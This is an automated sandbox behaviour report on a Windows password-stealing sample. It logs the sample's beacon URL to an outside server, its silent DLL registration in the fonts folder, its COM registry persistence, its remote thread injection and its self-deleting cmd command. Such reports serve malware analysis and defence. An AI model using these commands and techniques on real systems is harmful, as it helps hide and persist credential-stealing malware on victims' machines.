Analysis Report for 1c0f7615a421d5a4d3816857fa83a28d

Comment on this report

Summary:

Description	Risk
Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.
Spawns Processes: The executable produces processes during the execution.
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys.

Table of Contents
expand all	collapse all
General information sample.exe C:\sample.exe Primary Analysis Subject General Information a) Registry Activities b) File Activities c) Process Activities regsvr32.exe C:\WINDOWS\system32\regsvr32.exe Started by sample.exe General Information a) Registry Activities b) File Activities c) Process Activities cmd.exe C:\WINDOWS\system32\cmd.exe Started by sample.exe General Information a) Registry Activities b) File Activities

1. General Information

	- Information about Anubis' invocation

Time needed:	144 s
Report created:	03/20/09, 10:35:20 UTC
Termination reason:	All tracked processes have exited
Program version:	1.67.0

1.a) - Network Activity

	- HTTP Conversations:

From ANUBIS:1032 to 121.10.108.92:80 - [se1.abisp.cn]
Request: GET /count.asp?mac=525400123456&ver=20090312&key=82df76a582cff5caaa6c4530f61c09ee
Response: 404 "Not Found"
Request: GET /01.txt
Response: 404 "Not Found"
Request: GET /01.txt
Response: 404 "Not Found"
Request: GET /01.txt
Response: 404 "Not Found"
Request: GET /01.txt
Response: 404 "Not Found"
Request: GET /01.txt
Response: 404 "Not Found"
Request: GET /01.txt
Response: 404 "Not Found"

	- Unknown UDP Traffic:

from ANUBIS:1025 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 30 - Transferred inbound Bytes: 160

	- TCP Connection Attempts:

from ANUBIS:1034 to 121.10.108.92:80

from ANUBIS:1035 to 121.10.108.92:80

from ANUBIS:1036 to 121.10.108.92:80

from ANUBIS:1038 to 121.10.108.92:80

from ANUBIS:1039 to 121.10.108.92:80

from ANUBIS:1040 to 121.10.108.92:80

2. sample.exe

	- General information about this executable

Analysis Reason:	Primary Analysis Subject
Filename:	sample.exe
MD5:	1c0f7615a421d5a4d3816857fa83a28d
SHA-1:	a4017f0d1cc9b0207d336c7445bdf2be6c8e48c2
File Size:	23552 Bytes
Command Line:	"C:\sample.exe"
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\MSVCRT.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\Normaliz.dll	0x00370000	0x00009000
C:\WINDOWS\fonts\kfnaaocn.dll	0x10000000	0x0000D000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\WININET.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\ATL.DLL	0x76B20000	0x00011000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000

	- SigBuster Output

UPX All_Versions SN:1634

	- Ikarus Virus Scanner

PWS.Win32 (Sig-Id:26769627)

2.a) sample.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager	CriticalSectionTimeout	2592000	1
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	2
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

2.b) sample.exe - File Activities

	- Files Created:

C:\WINDOWS\fonts\gzgbxiazai.dat

C:\WINDOWS\fonts\kfnaaocn.tmp

C:\WINDOWS\xxxxxx.dll

	- Files Read:

C:\WINDOWS\fonts\gzgbxiazai.dat

	- Files Modified:

C:\WINDOWS\fonts\gzgbxiazai.dat

C:\WINDOWS\fonts\kfnaaocn.tmp

C:\WINDOWS\xxxxxx.dll

WMIDataDevice

	- Files Renamed:

Old Filename	New Filename
C:\WINDOWS\fonts\kfnaaocn.tmp	\??\C:\WINDOWS\fonts\kfnaaocn.dll

	- Device Control Communication:

File	Control Code	Times
\Device\KsecDD	0x00390008	1
WMIDataDevice	0x0022414C	2
WMIDataDevice	0x00228144	2

	- Memory Mapped Files:

File Name

C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll

C:\WINDOWS\WindowsShell.Manifest

C:\WINDOWS\fonts\kfnaaocn.dll

C:\WINDOWS\system32\ATL.DLL

C:\WINDOWS\system32\Apphelp.dll

C:\WINDOWS\system32\MSVCP60.dll

C:\WINDOWS\system32\cmd.exe

C:\WINDOWS\system32\regsvr32.exe

C:\Windows\AppPatch\sysmain.sdb

2.c) sample.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\system32\regsvr32.exe
C:\WINDOWS\system32\cmd.exe
	C:\WINDOWS\system32\cmd.exe /c del C:\sample.exe > nul

	- Remote Threads Created:

Affected Process

C:\WINDOWS\system32\regsvr32.exe

C:\WINDOWS\system32\cmd.exe

	- Thread Overview:

Time	Number of threads
After 39 seconds	1

	- Foreign Memory Regions Read:

Process: C:\WINDOWS\system32\cmd.exe

Process: C:\WINDOWS\system32\regsvr32.exe

	- Foreign Memory Regions Written:

Process: C:\WINDOWS\system32\cmd.exe

Process: C:\WINDOWS\system32\regsvr32.exe

3. regsvr32.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	regsvr32.exe
MD5:	fbdb9d0935b9907b809b381fddf1627f
SHA-1:	14d7e5daa80a19fe18a8098e2fc56fe3aac52bd9
File Size:	11776 Bytes
Command Line:	regsvr32.exe /s "C:\WINDOWS\fonts\kfnaaocn.dll"
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcGenral.DLL	0x6F880000	0x001CA000
C:\WINDOWS\system32\WINMM.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\MSACM32.dll	0x77BE0000	0x00015000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\UxTheme.dll	0x5AD70000	0x00038000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\Normaliz.dll	0x00880000	0x00009000
C:\WINDOWS\fonts\kfnaaocn.dll	0x10000000	0x0000D000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\WININET.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\ATL.DLL	0x76B20000	0x00011000
C:\WINDOWS\system32\CLBCATQ.DLL	0x76FD0000	0x0007F000
C:\WINDOWS\system32\COMRes.dll	0x77050000	0x000C5000

3.a) regsvr32.exe - Registry Activities

	- Registry Keys Created:

HKLM\Software\Classes\Dllhost.dllhostatl.1

HKLM\Software\Classes\Dllhost.dllhostatl.1\CLSID

HKLM\Software\Classes\Dllhost.dllhostatl

HKLM\Software\Classes\Dllhost.dllhostatl\CLSID

HKLM\Software\Classes\Dllhost.dllhostatl\CurVer

HKLM\Software\Classes\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}

HKLM\Software\Classes\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\ProgID

HKLM\Software\Classes\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\VersionIndependentProgID

HKLM\Software\Classes\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\Programmable

HKLM\Software\Classes\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\InprocServer32

HKLM\Software\Classes\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\TypeLib

HKLM\Software\Classes\TypeLib\{1A5ED667-F873-4549-9F86-3BE3B1754365}

HKLM\Software\Classes\TypeLib\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0

HKLM\Software\Classes\TypeLib\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0\FLAGS

HKLM\Software\Classes\TypeLib\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0\0

HKLM\Software\Classes\TypeLib\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0\0\win32

HKLM\Software\Classes\TypeLib\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0\HELPDIR

HKLM\Software\Classes\Interface\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}

HKLM\Software\Classes\Interface\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}\ProxyStubClsid

HKLM\Software\Classes\Interface\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}\ProxyStubClsid32

HKLM\Software\Classes\Interface\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}\TypeLib

	- Registry Values Modified:

Key	Name	New Value
HKLM\SOFTWARE\CLASSES\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}		dllhostatl Class
HKLM\SOFTWARE\CLASSES\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\INPROCSERVER32		C:\WINDOWS\fonts\kfnaaocn.dll
HKLM\SOFTWARE\CLASSES\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\INPROCSERVER32	ThreadingModel	Apartment
HKLM\SOFTWARE\CLASSES\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\PROGID		Dllhost.dllhostatl.1
HKLM\SOFTWARE\CLASSES\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\TYPELIB		{1A5ED667-F873-4549-9F86-3BE3B1754365}
HKLM\SOFTWARE\CLASSES\CLSID\{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}\VERSIONINDEPENDENTPROGID		Dllhost.dllhostatl
HKLM\SOFTWARE\CLASSES\DLLHOST.DLLHOSTATL		dllhostatl Class
HKLM\SOFTWARE\CLASSES\DLLHOST.DLLHOSTATL.1		dllhostatl Class
HKLM\SOFTWARE\CLASSES\DLLHOST.DLLHOSTATL.1\CLSID		{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}
HKLM\SOFTWARE\CLASSES\DLLHOST.DLLHOSTATL\CLSID		{4BB28DC6-CEA8-4ABA-B5F1-E56165B6D65D}
HKLM\SOFTWARE\CLASSES\DLLHOST.DLLHOSTATL\CURVER		Dllhost.dllhostatl.1
HKLM\SOFTWARE\CLASSES\INTERFACE\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}		Idllhostatl
HKLM\SOFTWARE\CLASSES\INTERFACE\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}\PROXYSTUBCLSID		{00020424-0000-0000-C000-000000000046}
HKLM\SOFTWARE\CLASSES\INTERFACE\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}\PROXYSTUBCLSID32		{00020424-0000-0000-C000-000000000046}
HKLM\SOFTWARE\CLASSES\INTERFACE\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}\TYPELIB		{1A5ED667-F873-4549-9F86-3BE3B1754365}
HKLM\SOFTWARE\CLASSES\INTERFACE\{AF59F601-FCF8-443A-8DBF-B7918AEB9094}\TYPELIB	Version	1.0
HKLM\SOFTWARE\CLASSES\TYPELIB\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0		dllhost 1.0 Type Library
HKLM\SOFTWARE\CLASSES\TYPELIB\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0\0\WIN32		C:\WINDOWS\fonts\kfnaaocn.dll
HKLM\SOFTWARE\CLASSES\TYPELIB\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0\FLAGS		0
HKLM\SOFTWARE\CLASSES\TYPELIB\{1A5ED667-F873-4549-9F86-3BE3B1754365}\1.0\HELPDIR		C:\WINDOWS\fonts\

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\CLASSES\.DLL		dllfile	1
HKLM\SOFTWARE\CLASSES\CLSID\{44EC053A-400F-11D0-9DCD-00A0C90391D3}\INPROCSERVER32		C:\WINDOWS\system32\ATL.DLL	1
HKLM\SOFTWARE\CLASSES\CLSID\{44EC053A-400F-11D0-9DCD-00A0C90391D3}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\Software\Microsoft\COM3	Com+Enabled	1	2
HKLM\Software\Microsoft\COM3	REGDBVersion	0x0f00000000000000	2

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\Software\Classes	1	Key Change,Value Change	3
HKLM\Software\Classes\CLSID	1	Key Change,Value Change	2
HKLM\Software\Microsoft\COM3	1	Key Change,Value Change	6
HKU	1	Key Change,Value Change	3

3.b) regsvr32.exe - File Activities

	- Files Read:

C:\WINDOWS\Registration\R00000000000f.clb

C:\WINDOWS\fonts\kfnaaocn.dll

	- Files Modified:

WMIDataDevice

	- Device Control Communication:

File	Control Code	Times
unnamed file	0x00390008	7
WMIDataDevice	0x0022414C	2
WMIDataDevice	0x00228144	2

	- Memory Mapped Files:

File Name

C:\WINDOWS\fonts\kfnaaocn.dll

C:\WINDOWS\system32\ATL.DLL

C:\WINDOWS\system32\CLBCATQ.DLL

C:\WINDOWS\system32\COMRes.dll

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\MSVCP60.dll

C:\WINDOWS\system32\rpcss.dll

3.c) regsvr32.exe - Process Activities

	- Thread Overview:

Time	Number of threads
After 58 seconds	1

4. cmd.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	cmd.exe
MD5:	6d778e0f95447e6546553eeea709d03c
SHA-1:	811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
File Size:	389120 Bytes
Command Line:	C:\WINDOWS\system32\cmd.exe /c del C:\sample.exe > nul
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcGenral.DLL	0x6F880000	0x001CA000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\WINMM.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\MSACM32.dll	0x77BE0000	0x00015000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\UxTheme.dll	0x5AD70000	0x00038000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

4.a) cmd.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\Software\Microsoft\Command Processor	AutoRun		1
HKLM\Software\Microsoft\Command Processor	CompletionChar	64	1
HKLM\Software\Microsoft\Command Processor	DefaultColor	0	1
HKLM\Software\Microsoft\Command Processor	EnableExtensions	1	1
HKLM\Software\Microsoft\Command Processor	PathCompletionChar	64	1
HKLM\System\CurrentControlSet\Control\Nls\Language Groups	1	1	1
HKLM\System\CurrentControlSet\Control\Nls\Locale	00000409	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	CompletionChar	9	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	DefaultColor	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	EnableExtensions	1	1

4.b) cmd.exe - File Activities

	- Files Deleted:

C:\sample.exe

	- Files Modified:

nul

Analysis Report for 1c0f7615a421d5a4d3816857fa83a28d

Summary:

Table of Contents